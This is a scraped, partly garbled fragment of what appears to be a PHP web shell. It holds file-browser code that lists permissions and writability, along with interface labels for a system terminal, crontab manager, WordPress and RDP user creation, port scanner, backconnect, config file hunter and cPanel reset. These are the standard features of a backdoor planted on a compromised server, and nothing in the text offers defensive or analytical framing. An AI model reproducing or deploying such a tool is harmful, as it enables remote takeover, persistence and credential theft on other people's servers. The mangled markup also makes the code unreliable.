Directory Contents
'; } $files = @scandir($current_dir); if ($files) { foreach ($files as $file) { if ($file == '.' || $file == '..') continue; $fullpath = $current_dir . '/' . $file; $is_dir = @is_dir($fullpath); $icon = $is_dir ? '' : ''; $size = $is_dir ? '-' : format_size(@filesize($fullpath)); $perms = substr(sprintf('%o', @fileperms($fullpath)), -4); $time = @date('Y-m-d H:i:s', @filemtime($fullpath)); $created = @date('Y-m-d H:i:s', @filectime($fullpath)); $is_writable = is_writable($fullpath); echo '
'.$icon.' ';
if ($is_dir) {
$dir_writable = is_writable_dir($fullpath);
echo ''.htmlspecialchars($file);
if (!$dir_writable) {
echo ' ';
}
echo '';
} else {
echo htmlspecialchars($file);
if (!$is_writable) {
echo ' ';
}
}
echo '
';
}
} else {
echo '
Created: ' . $created . '
Modified: ' . $time . '
';
if (!$is_dir) {
echo ' Download
';
}
echo '
Cannot read directory contents
';
}
?>
System Terminal
// Terminal ready. Type commands below.
Crontab Manager
Loading crontab...
Add WordPress User
Port Scanner
Webshell Scanner
Backconnect
Config File Hunter
cPanel Reset
RDP Manager (Windows Only)
Add RDP User
RDP Information
Server IP:
Default Port: 3389
Note: This feature works only on Windows servers
Default Port: 3389
Note: This feature works only on Windows servers